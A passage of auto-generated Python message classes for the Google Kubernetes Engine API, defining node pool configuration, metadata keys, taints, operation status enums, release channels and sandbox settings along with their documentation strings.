MetadataValue: The metadata key/value pairs assigned to instances in the
cluster. Keys must conform to the regexp [a-zA-Z0-9-_]+ and be less
than 128 bytes in length. These are reflected as part of a URL in the
metadata server. Additionally, to avoid ambiguity, keys must not
conflict with any other metadata keys for the project or be one of the
reserved keys: "cluster-location" "cluster-name" "cluster-uid"
"configure-sh" "containerd-configure-sh" "enable-os-login" "gci-
ensure-gke-docker" "gci-metrics-enabled" "gci-update-strategy"
"instance-template" "kube-env" "startup-script" "user-data"
"disable-address-manager" "windows-startup-script-ps1" "common-psm1"
"k8s-node-setup-psm1" "install-ssh-psm1" "user-profile-psm1" "serial-
port-logging-enable" Values are free-form strings, and only have meaning
as interpreted by the image running in the instance. The only
restriction placed on them is that each value's size must be less than
or equal to 32 KB. The total size of all keys and values must be less
than 512 KB.
Fields:
accelerators: A list of hardware accelerators to be attached to each node.
See https://cloud.google.com/compute/docs/gpus for more information
about support for GPUs.
bootDiskKmsKey: The Customer Managed Encryption Key used to encrypt the
boot disk attached to each node in the node pool. This should be of the
form projects/[KEY_PROJECT_ID]/locations/[LOCATION]/keyRings/[RING_NAME]
/cryptoKeys/[KEY_NAME]. For more information about protecting resources
with Cloud KMS Keys please see:
https://cloud.google.com/compute/docs/disks/customer-managed-encryption
diskSizeGb: Size of the disk attached to each node, specified in GB. The
smallest allowed disk size is 10GB. If unspecified, the default disk
size is 100GB.
diskType: Type of the disk attached to each node (e.g. 'pd-standard' or
'pd-ssd') If unspecified, the default disk type is 'pd-standard'
imageType: The image type to use for this node. Note that for a given
image type, the latest version of it will be used.
kubeletConfig: Node kubelet configs.
labels: The map of Kubernetes labels (key/value pairs) to be applied to
each node. These will added in addition to any default label(s) that
Kubernetes may apply to the node. In case of conflict in label keys, the
applied set may differ depending on the Kubernetes version -- it's best
to assume the behavior is undefined and conflicts should be avoided. For
more information, including usage and the valid values, see:
https://kubernetes.io/docs/concepts/overview/working-with-
objects/labels/
linuxNodeConfig: Parameters that can be configured on Linux nodes.
localSsdCount: The number of local SSD disks to be attached to the node.
The limit for this value is dependent upon the maximum number of disks
available on a machine per zone. See:
https://cloud.google.com/compute/docs/disks/local-ssd for more
information.
localSsdVolumeConfigs: Parameters for using Local SSD with extra options
as hostpath or local volumes
machineType: The name of a Google Compute Engine [machine
type](/compute/docs/machine-types) (e.g. `n1-standard-1`). If
unspecified, the default machine type is `n1-standard-1`.
metadata: The metadata key/value pairs assigned to instances in the
cluster. Keys must conform to the regexp [a-zA-Z0-9-_]+ and be less
than 128 bytes in length. These are reflected as part of a URL in the
metadata server. Additionally, to avoid ambiguity, keys must not
conflict with any other metadata keys for the project or be one of the
reserved keys: "cluster-location" "cluster-name" "cluster-uid"
"configure-sh" "containerd-configure-sh" "enable-os-login" "gci-
ensure-gke-docker" "gci-metrics-enabled" "gci-update-strategy"
"instance-template" "kube-env" "startup-script" "user-data"
"disable-address-manager" "windows-startup-script-ps1" "common-psm1"
"k8s-node-setup-psm1" "install-ssh-psm1" "user-profile-psm1" "serial-
port-logging-enable" Values are free-form strings, and only have meaning
as interpreted by the image running in the instance. The only
restriction placed on them is that each value's size must be less than
or equal to 32 KB. The total size of all keys and values must be less
than 512 KB.
minCpuPlatform: Minimum CPU platform to be used by this instance. The
instance may be scheduled on the specified or newer CPU platform.
Applicable values are the friendly names of CPU platforms, such as
<code>minCpuPlatform: "Intel Haswell"</code> or
<code>minCpuPlatform: "Intel Sandy Bridge"</code>. For more
information, read [how to specify min CPU
platform](https://cloud.google.com/compute/docs/instances/specify-min-
cpu-platform)
nodeGroup: The optional node group. Setting this field will assign
instances of this pool to run on the specified node group. This is
useful for running workloads on [sole tenant
nodes](/compute/docs/nodes/)
nodeImageConfig: The node image configuration to use for this node pool.
Note that this is only applicable for node pools using
image_type=CUSTOM.
oauthScopes: The set of Google API scopes to be made available on all of
the node VMs under the "default" service account. The following scopes
are recommended, but not required, and by default are not included: *
`https://www.googleapis.com/auth/compute` is required for mounting
persistent storage on your nodes. *
`https://www.googleapis.com/auth/devstorage.read_only` is required for
communicating with **gcr.io** (the [Google Container Registry
](/container-registry/)). If unspecified, no scopes are added, unless
Cloud Logging or Cloud Monitoring are enabled, in which case their
required scopes will be added.
preemptible: Whether the nodes are created as preemptible VM instances.
See: https://cloud.google.com/compute/docs/instances/preemptible for
more inforamtion about preemptible VM instances.
reservationAffinity: The optional reservation affinity. Setting this field
will apply the specified [Zonal Compute
Reservation](/compute/docs/instances/reserving-zonal-resources) to this
node pool.
sandboxConfig: Sandbox configuration for this node.
serviceAccount: The Google Cloud Platform Service Account to be used by
the node VMs. Specify the email address of the Service Account;
otherwise, if no Service Account is specified, the "default" service
account is used.
shieldedInstanceConfig: Shielded Instance options.
tags: The list of instance tags applied to all nodes. Tags are used to
identify valid sources or targets for network firewalls and are
specified by the client during cluster or node pool creation. Each tag
within the list must comply with RFC1035.
taints: List of kubernetes taints to be applied to each node. For more
information, including usage and the valid values, see:
https://kubernetes.io/docs/concepts/configuration/taint-and-toleration/
workloadMetadataConfig: The workload metadata configuration for this node.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""The map of Kubernetes labels (key/value pairs) to be applied to each
node. These will added in addition to any default label(s) that Kubernetes
may apply to the node. In case of conflict in label keys, the applied set
may differ depending on the Kubernetes version -- it's best to assume the
behavior is undefined and conflicts should be avoided. For more
information, including usage and the valid values, see:
https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
@encoding.MapUnrecognizedFields('additionalProperties')
class MetadataValue(_messages.Message):
r"""The metadata key/value pairs assigned to instances in the cluster.
Keys must conform to the regexp [a-zA-Z0-9-_]+ and be less than 128 bytes
in length. These are reflected as part of a URL in the metadata server.
Additionally, to avoid ambiguity, keys must not conflict with any other
metadata keys for the project or be one of the reserved keys: "cluster-
location" "cluster-name" "cluster-uid" "configure-sh" "containerd-
configure-sh" "enable-os-login" "gci-ensure-gke-docker" "gci-metrics-
enabled" "gci-update-strategy" "instance-template" "kube-env"
"startup-script" "user-data" "disable-address-manager" "windows-
startup-script-ps1" "common-psm1" "k8s-node-setup-psm1" "install-ssh-
psm1" "user-profile-psm1" "serial-port-logging-enable" Values are free-
form strings, and only have meaning as interpreted by the image running in
the instance. The only restriction placed on them is that each value's
size must be less than or equal to 32 KB. The total size of all keys and
values must be less than 512 KB.
Messages:
AdditionalProperty: An additional property for a MetadataValue object.
Fields:
additionalProperties: Additional properties of type MetadataValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a MetadataValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
accelerators = _messages.MessageField('AcceleratorConfig', 1, repeated=True)
bootDiskKmsKey = _messages.StringField(2)
diskSizeGb = _messages.IntegerField(3, variant=_messages.Variant.INT32)
diskType = _messages.StringField(4)
imageType = _messages.StringField(5)
kubeletConfig = _messages.MessageField('NodeKubeletConfig', 6)
labels = _messages.MessageField('LabelsValue', 7)
linuxNodeConfig = _messages.MessageField('LinuxNodeConfig', 8)
localSsdCount = _messages.IntegerField(9, variant=_messages.Variant.INT32)
localSsdVolumeConfigs = _messages.MessageField('LocalSsdVolumeConfig', 10, repeated=True)
machineType = _messages.StringField(11)
metadata = _messages.MessageField('MetadataValue', 12)
minCpuPlatform = _messages.StringField(13)
nodeGroup = _messages.StringField(14)
nodeImageConfig = _messages.MessageField('CustomImageConfig', 15)
oauthScopes = _messages.StringField(16, repeated=True)
preemptible = _messages.BooleanField(17)
reservationAffinity = _messages.MessageField('ReservationAffinity', 18)
sandboxConfig = _messages.MessageField('SandboxConfig', 19)
serviceAccount = _messages.StringField(20)
shieldedInstanceConfig = _messages.MessageField('ShieldedInstanceConfig', 21)
tags = _messages.StringField(22, repeated=True)
taints = _messages.MessageField('NodeTaint', 23, repeated=True)
workloadMetadataConfig = _messages.MessageField('WorkloadMetadataConfig', 24)
class NodeKubeletConfig(_messages.Message):
r"""Node kubelet configs. NOTE: This is an Alpha only API.
Fields:
cpuCfsQuota: Enable CPU CFS quota enforcement for containers that specify
CPU limits. If this option is enabled, kubelet uses CFS quota
(https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt) to
enforce container CPU limits. Otherwise, CPU limits will not be enforced
at all. Disable this option to mitigate CPU throttling problems while
still having your pods to be in Guaranteed QoS class by specifying the
CPU limits. The default value is 'true' if unspecified.
cpuCfsQuotaPeriod: Set the CPU CFS quota period value 'cpu.cfs_period_us'.
The string must be a sequence of decimal numbers, each with optional
fraction and a unit suffix, such as "300ms". Valid time units are "ns",
"us" (or "\xb5s"), "ms", "s", "m", "h". The value must be a positive
duration.
cpuManagerPolicy: Control the CPU management policy on the node. See
https://kubernetes.io/docs/tasks/administer-cluster/cpu-management-
policies/ The following values are allowed. - "none": the default,
which represents the existing scheduling behavior. - "static": allows
pods with certain resource characteristics to be granted
increased CPU affinity and exclusivity on the node.
"""
cpuCfsQuota = _messages.BooleanField(1)
cpuCfsQuotaPeriod = _messages.StringField(2)
cpuManagerPolicy = _messages.StringField(3)
class NodeManagement(_messages.Message):
r"""NodeManagement defines the set of node management services turned on for
the node pool.
Fields:
autoRepair: Whether the nodes will be automatically repaired.
autoUpgrade: Whether the nodes will be automatically upgraded.
upgradeOptions: Specifies the Auto Upgrade knobs for the node pool.
"""
autoRepair = _messages.BooleanField(1)
autoUpgrade = _messages.BooleanField(2)
upgradeOptions = _messages.MessageField('AutoUpgradeOptions', 3)
class NodePool(_messages.Message):
r"""NodePool contains the name and configuration for a cluster's node pool.
Node pools are a set of nodes (i.e. VM's), with a common configuration and
specification, under the control of the cluster master. They may have a set
of Kubernetes labels applied to them, which may be used to reference them
during pod scheduling. They may also be resized up or down, to accommodate
the workload.
Enums:
StatusValueValuesEnum: [Output only] The status of the nodes in this pool
instance.
Fields:
autoscaling: Autoscaler configuration for this NodePool. Autoscaler is
enabled only if a valid configuration is present.
conditions: Which conditions caused the current node pool state.
config: The node configuration of the pool.
initialNodeCount: The initial node count for the pool. You must ensure
that your Compute Engine <a href="/compute/docs/resource-
quotas">resource quota</a> is sufficient for this number of instances.
You must also have available firewall and routes quota.
instanceGroupUrls: [Output only] The resource URLs of the [managed
instance groups](/compute/docs/instance-groups/creating-groups-of-
managed-instances) associated with this node pool.
locations: The list of Google Compute Engine
[zones](/compute/docs/zones#available) in which the NodePool's nodes
should be located.
management: NodeManagement configuration for this NodePool.
maxPodsConstraint: The constraint on the maximum number of pods that can
be run simultaneously on a node in the node pool.
name: The name of the node pool.
podIpv4CidrSize: [Output only] The pod CIDR block size per node in this
node pool.
resourceVersion: Server-defined resource version (etag).
selfLink: [Output only] Server-defined URL for the resource.
status: [Output only] The status of the nodes in this pool instance.
statusMessage: [Output only] Additional information about the current
status of this node pool instance, if available. Deprecated, use the
field conditions instead.
upgradeSettings: Upgrade settings control disruption and speed of the
upgrade.
version: The version of the Kubernetes of this node.
"""
class StatusValueValuesEnum(_messages.Enum):
r"""[Output only] The status of the nodes in this pool instance.
Values:
STATUS_UNSPECIFIED: Not set.
PROVISIONING: The PROVISIONING state indicates the node pool is being
created.
RUNNING: The RUNNING state indicates the node pool has been created and
is fully usable.
RUNNING_WITH_ERROR: The RUNNING_WITH_ERROR state indicates the node pool
has been created and is partially usable. Some error state has
occurred and some functionality may be impaired. Customer may need to
reissue a request or trigger a new update.
RECONCILING: The RECONCILING state indicates that some work is actively
being done on the node pool, such as upgrading node software. Details
can be found in the `statusMessage` field.
STOPPING: The STOPPING state indicates the node pool is being deleted.
ERROR: The ERROR state indicates the node pool may be unusable. Details
can be found in the `statusMessage` field.
"""
STATUS_UNSPECIFIED = 0
PROVISIONING = 1
RUNNING = 2
RUNNING_WITH_ERROR = 3
RECONCILING = 4
STOPPING = 5
ERROR = 6
autoscaling = _messages.MessageField('NodePoolAutoscaling', 1)
conditions = _messages.MessageField('StatusCondition', 2, repeated=True)
config = _messages.MessageField('NodeConfig', 3)
initialNodeCount = _messages.IntegerField(4, variant=_messages.Variant.INT32)
instanceGroupUrls = _messages.StringField(5, repeated=True)
locations = _messages.StringField(6, repeated=True)
management = _messages.MessageField('NodeManagement', 7)
maxPodsConstraint = _messages.MessageField('MaxPodsConstraint', 8)
name = _messages.StringField(9)
podIpv4CidrSize = _messages.IntegerField(10, variant=_messages.Variant.INT32)
resourceVersion = _messages.StringField(11)
selfLink = _messages.StringField(12)
status = _messages.EnumField('StatusValueValuesEnum', 13)
statusMessage = _messages.StringField(14)
upgradeSettings = _messages.MessageField('UpgradeSettings', 15)
version = _messages.StringField(16)
class NodePoolAutoscaling(_messages.Message):
r"""NodePoolAutoscaling contains information required by cluster autoscaler
to adjust the size of the node pool to the current cluster usage.
Fields:
autoprovisioned: Can this node pool be deleted automatically.
enabled: Is autoscaling enabled for this node pool.
maxNodeCount: Maximum number of nodes in the NodePool. Must be >=
min_node_count. There has to enough quota to scale up the cluster.
minNodeCount: Minimum number of nodes in the NodePool. Must be >= 1 and <=
max_node_count.
"""
autoprovisioned = _messages.BooleanField(1)
enabled = _messages.BooleanField(2)
maxNodeCount = _messages.IntegerField(3, variant=_messages.Variant.INT32)
minNodeCount = _messages.IntegerField(4, variant=_messages.Variant.INT32)
class NodeTaint(_messages.Message):
r"""Kubernetes taint is comprised of three fields: key, value, and effect.
Effect can only be one of three types: NoSchedule, PreferNoSchedule or
NoExecute. For more information, including usage and the valid values, see:
https://kubernetes.io/docs/concepts/configuration/taint-and-toleration/
Enums:
EffectValueValuesEnum: Effect for taint.
Fields:
effect: Effect for taint.
key: Key for taint.
value: Value for taint.
"""
class EffectValueValuesEnum(_messages.Enum):
r"""Effect for taint.
Values:
EFFECT_UNSPECIFIED: Not set
NO_SCHEDULE: NoSchedule
PREFER_NO_SCHEDULE: PreferNoSchedule
NO_EXECUTE: NoExecute
"""
EFFECT_UNSPECIFIED = 0
NO_SCHEDULE = 1
PREFER_NO_SCHEDULE = 2
NO_EXECUTE = 3
effect = _messages.EnumField('EffectValueValuesEnum', 1)
key = _messages.StringField(2)
value = _messages.StringField(3)
class Operation(_messages.Message):
r"""This operation resource represents operations that may have happened or
are happening on the cluster. All fields are output only.
Enums:
OperationTypeValueValuesEnum: The operation type.
StatusValueValuesEnum: The current status of the operation.
Fields:
clusterConditions: Which conditions caused the current cluster state.
detail: Detailed operation progress, if available.
endTime: [Output only] The time the operation completed, in
[RFC3339](https://www.ietf.org/rfc/rfc3339.txt) text format.
location: [Output only] The name of the Google Compute Engine
[zone](/compute/docs/regions-zones/regions-zones#available) or
[region](/compute/docs/regions-zones/regions-zones#available) in which
the cluster resides.
name: The server-assigned ID for the operation.
nodepoolConditions: Which conditions caused the current node pool state.
operationType: The operation type.
progress: Output only. [Output only] Progress information for an
operation.
selfLink: Server-defined URL for the resource.
startTime: [Output only] The time the operation started, in
[RFC3339](https://www.ietf.org/rfc/rfc3339.txt) text format.
status: The current status of the operation.
statusMessage: Output only. If an error has occurred, a textual
description of the error.
targetLink: Server-defined URL for the target of the operation.
zone: The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the operation is taking
place. This field is deprecated, use location instead.
"""
class OperationTypeValueValuesEnum(_messages.Enum):
r"""The operation type.
Values:
TYPE_UNSPECIFIED: Not set.
CREATE_CLUSTER: Cluster create.
DELETE_CLUSTER: Cluster delete.
UPGRADE_MASTER: A master upgrade.
UPGRADE_NODES: A node upgrade.
REPAIR_CLUSTER: Cluster repair.
UPDATE_CLUSTER: Cluster update.
CREATE_NODE_POOL: Node pool create.
DELETE_NODE_POOL: Node pool delete.
SET_NODE_POOL_MANAGEMENT: Set node pool management.
AUTO_REPAIR_NODES: Automatic node pool repair.
AUTO_UPGRADE_NODES: Automatic node upgrade.
SET_LABELS: Set labels.
SET_MASTER_AUTH: Set/generate master auth materials
SET_NODE_POOL_SIZE: Set node pool size.
SET_NETWORK_POLICY: Updates network policy for a cluster.
SET_MAINTENANCE_POLICY: Set the maintenance policy.
UPDATE_IP_ALLOCATION_POLICY: Update cluster IP allocation policy.
"""
TYPE_UNSPECIFIED = 0
CREATE_CLUSTER = 1
DELETE_CLUSTER = 2
UPGRADE_MASTER = 3
UPGRADE_NODES = 4
REPAIR_CLUSTER = 5
UPDATE_CLUSTER = 6
CREATE_NODE_POOL = 7
DELETE_NODE_POOL = 8
SET_NODE_POOL_MANAGEMENT = 9
AUTO_REPAIR_NODES = 10
AUTO_UPGRADE_NODES = 11
SET_LABELS = 12
SET_MASTER_AUTH = 13
SET_NODE_POOL_SIZE = 14
SET_NETWORK_POLICY = 15
SET_MAINTENANCE_POLICY = 16
UPDATE_IP_ALLOCATION_POLICY = 17
class StatusValueValuesEnum(_messages.Enum):
r"""The current status of the operation.
Values:
STATUS_UNSPECIFIED: Not set.
PENDING: The operation has been created.
RUNNING: The operation is currently running.
DONE: The operation is done, either cancelled or completed.
ABORTING: The operation is aborting.
"""
STATUS_UNSPECIFIED = 0
PENDING = 1
RUNNING = 2
DONE = 3
ABORTING = 4
clusterConditions = _messages.MessageField('StatusCondition', 1, repeated=True)
detail = _messages.StringField(2)
endTime = _messages.StringField(3)
location = _messages.StringField(4)
name = _messages.StringField(5)
nodepoolConditions = _messages.MessageField('StatusCondition', 6, repeated=True)
operationType = _messages.EnumField('OperationTypeValueValuesEnum', 7)
progress = _messages.MessageField('OperationProgress', 8)
selfLink = _messages.StringField(9)
startTime = _messages.StringField(10)
status = _messages.EnumField('StatusValueValuesEnum', 11)
statusMessage = _messages.StringField(12)
targetLink = _messages.StringField(13)
zone = _messages.StringField(14)
class OperationProgress(_messages.Message):
r"""Information about operation (or operation stage) progress.
Enums:
StatusValueValuesEnum: Status of an operation stage. Unset for single-
stage operations.
Fields:
metrics: Progress metric bundle, for example: metrics: [{name: "nodes
done", int_value: 15}, {name: "nodes total",
int_value: 32}] or metrics: [{name: "progress", double_value:
0.56}, {name: "progress scale", double_value: 1.0}]
name: A non-parameterized string describing an operation stage. Unset for
single-stage operations.
stages: Substages of an operation or a stage.
status: Status of an operation stage. Unset for single-stage operations.
"""
class StatusValueValuesEnum(_messages.Enum):
r"""Status of an operation stage. Unset for single-stage operations.
Values:
STATUS_UNSPECIFIED: Not set.
PENDING: The operation has been created.
RUNNING: The operation is currently running.
DONE: The operation is done, either cancelled or completed.
ABORTING: The operation is aborting.
"""
STATUS_UNSPECIFIED = 0
PENDING = 1
RUNNING = 2
DONE = 3
ABORTING = 4
metrics = _messages.MessageField('Metric', 1, repeated=True)
name = _messages.StringField(2)
stages = _messages.MessageField('OperationProgress', 3, repeated=True)
status = _messages.EnumField('StatusValueValuesEnum', 4)
class PodSecurityPolicyConfig(_messages.Message):
r"""Configuration for the PodSecurityPolicy feature.
Fields:
enabled: Enable the PodSecurityPolicy controller for this cluster. If
enabled, pods must be valid under a PodSecurityPolicy to be created.
"""
enabled = _messages.BooleanField(1)
class PremiumConfig(_messages.Message):
r"""PremiumConfig is the configuration for all premium features and tiers.
Fields:
features: The features that GKE provides.
tiers: The tiers that are part of the premium offering.
"""
features = _messages.MessageField('FeatureConfig', 1, repeated=True)
tiers = _messages.MessageField('TierConfig', 2, repeated=True)
class PrivateClusterConfig(_messages.Message):
r"""Configuration options for private clusters.
Fields:
enablePeeringRouteSharing: Whether to enable route sharing over the
network peering.
enablePrivateEndpoint: Whether the master's internal IP address is used as
the cluster endpoint.
enablePrivateNodes: Whether nodes have internal IP addresses only. If
enabled, all nodes are given only RFC 1918 private addresses and
communicate with the master via private networking.
masterIpv4CidrBlock: The IP range in CIDR notation to use for the hosted
master network. This range will be used for assigning internal IP
addresses to the master or set of masters, as well as the ILB VIP. This
range must not overlap with any other ranges in use within the cluster's
network.
peeringName: Output only. The peering name in the customer VPC used by
this cluster.
privateEndpoint: Output only. The internal IP address of this cluster's
endpoint.
publicEndpoint: Output only. The external IP address of this cluster's
endpoint.
"""
enablePeeringRouteSharing = _messages.BooleanField(1)
enablePrivateEndpoint = _messages.BooleanField(2)
enablePrivateNodes = _messages.BooleanField(3)
masterIpv4CidrBlock = _messages.StringField(4)
peeringName = _messages.StringField(5)
privateEndpoint = _messages.StringField(6)
publicEndpoint = _messages.StringField(7)
class PrivateIPv6Status(_messages.Message):
r"""PrivateIPv6Status contains the desired state of the IPv6 fast path on
this cluster. Private IPv6 access allows direct high speed communication
from GKE pods to gRPC Google cloud services over IPv6.
Fields:
enabled: Enables private IPv6 access to Google Cloud services for this
cluster.
"""
enabled = _messages.BooleanField(1)
class RecurringTimeWindow(_messages.Message):
r"""Represents an arbitrary window of time that recurs.
Fields:
recurrence: An RRULE (https://tools.ietf.org/html/rfc5545#section-3.8.5.3)
for how this window reccurs. They go on for the span of time between the
start and end time. For example, to have something repeat every
weekday, you'd use: <code>FREQ=WEEKLY;BYDAY=MO,TU,WE,TH,FR</code> To
repeat some window daily (equivalent to the DailyMaintenanceWindow):
<code>FREQ=DAILY</code> For the first weekend of every month:
<code>FREQ=MONTHLY;BYSETPOS=1;BYDAY=SA,SU</code> This specifies how
frequently the window starts. Eg, if you wanted to have a 9-5 UTC-4
window every weekday, you'd use something like: <code> start time =
2019-01-01T09:00:00-0400 end time = 2019-01-01T17:00:00-0400
recurrence = FREQ=WEEKLY;BYDAY=MO,TU,WE,TH,FR </code> Windows can span
multiple days. Eg, to make the window encompass every weekend from
midnight Saturday till the last minute of Sunday UTC: <code> start
time = 2019-01-05T00:00:00Z end time = 2019-01-07T23:59:00Z
recurrence = FREQ=WEEKLY;BYDAY=SA </code> Note the start and end time's
specific dates are largely arbitrary except to specify duration of the
window and when it first starts. The FREQ values of HOURLY, MINUTELY,
and SECONDLY are not supported.
window: The window of the first recurrence.
"""
recurrence = _messages.StringField(1)
window = _messages.MessageField('TimeWindow', 2)
class ReleaseChannel(_messages.Message):
r"""ReleaseChannel indicates which release channel a cluster is subscribed
to. Release channels are arranged in order of risk and frequency of updates.
When a cluster is subscribed to a release channel, Google maintains both the
master version and the node version. Node auto-upgrade defaults to true and
cannot be disabled. Updates to version related fields (e.g.
current_master_version) return an error.
Enums:
ChannelValueValuesEnum: channel specifies which release channel the
cluster is subscribed to.
Fields:
channel: channel specifies which release channel the cluster is subscribed
to.
"""
class ChannelValueValuesEnum(_messages.Enum):
r"""channel specifies which release channel the cluster is subscribed to.
Values:
UNSPECIFIED: No channel specified.
RAPID: RAPID channel is offered on an early access basis for customers
who want to test new releases before they are qualified for production
use or general availability. New upgrades will occur roughly weekly.
WARNING: Versions available in the RAPID Channel may be subject to
unresolved issues with no known workaround and are not for use with
production workloads or subject to any SLAs.
REGULAR: Clusters subscribed to REGULAR receive versions that are
considered GA quality. REGULAR is intended for production users who
want to take advantage of new features. New upgrades will occur
roughly every few weeks.
STABLE: Clusters subscribed to STABLE receive versions that are known to
be stable and reliable in production. STABLE is intended for
production users who need stability above all else, or for whom
frequent upgrades are too risky. New upgrades will occur roughly every
few months.
"""
UNSPECIFIED = 0
RAPID = 1
REGULAR = 2
STABLE = 3
channel = _messages.EnumField('ChannelValueValuesEnum', 1)
class ReleaseChannelConfig(_messages.Message):
r"""ReleaseChannelConfig exposes configuration for a release channel.
Enums:
ChannelValueValuesEnum: The release channel this configuration applies to.
Fields:
availableVersions: List of available versions for the release channel.
channel: The release channel this configuration applies to.
defaultVersion: The default version for newly created clusters on the
channel.
"""
class ChannelValueValuesEnum(_messages.Enum):
r"""The release channel this configuration applies to.
Values:
UNSPECIFIED: No channel specified.
RAPID: RAPID channel is offered on an early access basis for customers
who want to test new releases before they are qualified for production
use or general availability. New upgrades will occur roughly weekly.
WARNING: Versions available in the RAPID Channel may be subject to
unresolved issues with no known workaround and are not for use with
production workloads or subject to any SLAs.
REGULAR: Clusters subscribed to REGULAR receive versions that are
considered GA quality. REGULAR is intended for production users who
want to take advantage of new features. New upgrades will occur
roughly every few weeks.
STABLE: Clusters subscribed to STABLE receive versions that are known to
be stable and reliable in production. STABLE is intended for
production users who need stability above all else, or for whom
frequent upgrades are too risky. New upgrades will occur roughly every
few months.
"""
UNSPECIFIED = 0
RAPID = 1
REGULAR = 2
STABLE = 3
availableVersions = _messages.MessageField('AvailableVersion', 1, repeated=True)
channel = _messages.EnumField('ChannelValueValuesEnum', 2)
defaultVersion = _messages.StringField(3)
class ReservationAffinity(_messages.Message):
r"""[ReservationAffinity](/compute/docs/instances/reserving-zonal-resources)
is the configuration of desired reservation which instances could take
capacity from.
Enums:
ConsumeReservationTypeValueValuesEnum: Corresponds to the type of
reservation consumption.
Fields:
consumeReservationType: Corresponds to the type of reservation
consumption.
key: Corresponds to the label key of a reservation resource. To target a
SPECIFIC_RESERVATION by name, specify "googleapis.com/reservation-name"
as the key and specify the name of your reservation as its value.
values: Corresponds to the label value(s) of reservation resource(s).
"""
class ConsumeReservationTypeValueValuesEnum(_messages.Enum):
r"""Corresponds to the type of reservation consumption.
Values:
UNSPECIFIED: Default value. This should not be used.
NO_RESERVATION: Do not consume from any reserved capacity.
ANY_RESERVATION: Consume any reservation available.
SPECIFIC_RESERVATION: Must consume from a specific reservation. Must
specify key value fields for specifying the reservations.
"""
UNSPECIFIED = 0
NO_RESERVATION = 1
ANY_RESERVATION = 2
SPECIFIC_RESERVATION = 3
consumeReservationType = _messages.EnumField('ConsumeReservationTypeValueValuesEnum', 1)
key = _messages.StringField(2)
values = _messages.StringField(3, repeated=True)
class ResourceLimit(_messages.Message):
r"""Contains information about amount of some resource in the cluster. For
memory, value should be in GB.
Fields:
maximum: Maximum amount of the resource in the cluster.
minimum: Minimum amount of the resource in the cluster.
resourceType: Resource name "cpu", "memory" or gpu-specific string.
"""
maximum = _messages.IntegerField(1)
minimum = _messages.IntegerField(2)
resourceType = _messages.StringField(3)
class ResourceUsageExportConfig(_messages.Message):
r"""Configuration for exporting cluster resource usages.
Fields:
bigqueryDestination: Configuration to use BigQuery as usage export
destination.
consumptionMeteringConfig: Configuration to enable resource consumption
metering.
enableNetworkEgressMetering: Whether to enable network egress metering for
this cluster. If enabled, a daemonset will be created in the cluster to
meter network egress traffic.
"""
bigqueryDestination = _messages.MessageField('BigQueryDestination', 1)
consumptionMeteringConfig = _messages.MessageField('ConsumptionMeteringConfig', 2)
enableNetworkEgressMetering = _messages.BooleanField(3)
class RollbackNodePoolUpgradeRequest(_messages.Message):
r"""RollbackNodePoolUpgradeRequest rollbacks the previously Aborted or
Failed NodePool upgrade. This will be an no-op if the last upgrade
successfully completed.
Fields:
clusterId: Deprecated. The name of the cluster to rollback. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool id) of the node poll
to rollback upgrade. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool to rollback. This field
has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2)
nodePoolId = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SandboxConfig(_messages.Message):
r"""SandboxConfig contains configurations of the sandbox to use for the
node.
Enums:
TypeValueValuesEnum: Type of the sandbox to use for the node.
Fields:
sandboxType: Type of the sandbox to use for the node (e.g. 'gvisor')
type: Type of the sandbox to use for the node.
"""
class TypeValueValuesEnum(_messages.Enum):
r"""Type of the sandbox to use for the node.
Values:
UNSPECIFIED: Default value. This should not be used.
GVISOR: Run sandbox using gvisor.
"""
UNSPECIFIED = 0
GVISOR = 1
sandboxType = _messages.StringField(1)
type = _messages.EnumField('TypeValueValuesEnum', 2)
class SecurityProfile(_messages.Message):
r"""User selected security profile
Fields:
disableRuntimeRules: Don't apply runtime rules. When set to true, no
objects/deployments will be installed in the cluster to enforce runtime
rules. This is useful to work with config-as-code systems
name: Name with version of selected security profile A security profile
name follows kebob-case (a-zA-Z*) and a version is like MAJOR.MINOR-
suffix suffix is ([a-zA-Z0-9\-_\.]+) e.g. default-1.0-gke.0
"""
disableRuntimeRules = _messages.BooleanField(1)
name = _messages.StringField(2)
class ServerConfig(_messages.Message):
r"""Kubernetes Engine service configuration.
Fields:
channels: List of release channel configurations.
defaultClusterVersion: Version of Kubernetes the service deploys by
default.
defaultImageType: Default image type.
premiumConfig: Premium configuration for the service.
validImageTypes: List of valid image types.
validMasterVersions: List of valid master versions.
validNodeVersions: List of valid node upgrade target versions.
"""
channels = _messages.MessageField('ReleaseChannelConfig', 1, repeated=True)
defaultClusterVersion = _messages.StringField(2)
defaultImageType = _messages.StringField(3)
premiumConfig = _messages.MessageField('PremiumConfig', 4)
validImageTypes = _messages.StringField(5, repeated=True)
validMasterVersions = _messages.StringField(6, repeated=True)
validNodeVersions = _messages.StringField(7, repeated=True)
class SetAddonsConfigRequest(_messages.Message):
r"""SetAddonsRequest sets the addons associated with the cluster.
Fields:
addonsConfig: The desired configurations for the various addons available
to run in the cluster.
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to set addons.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
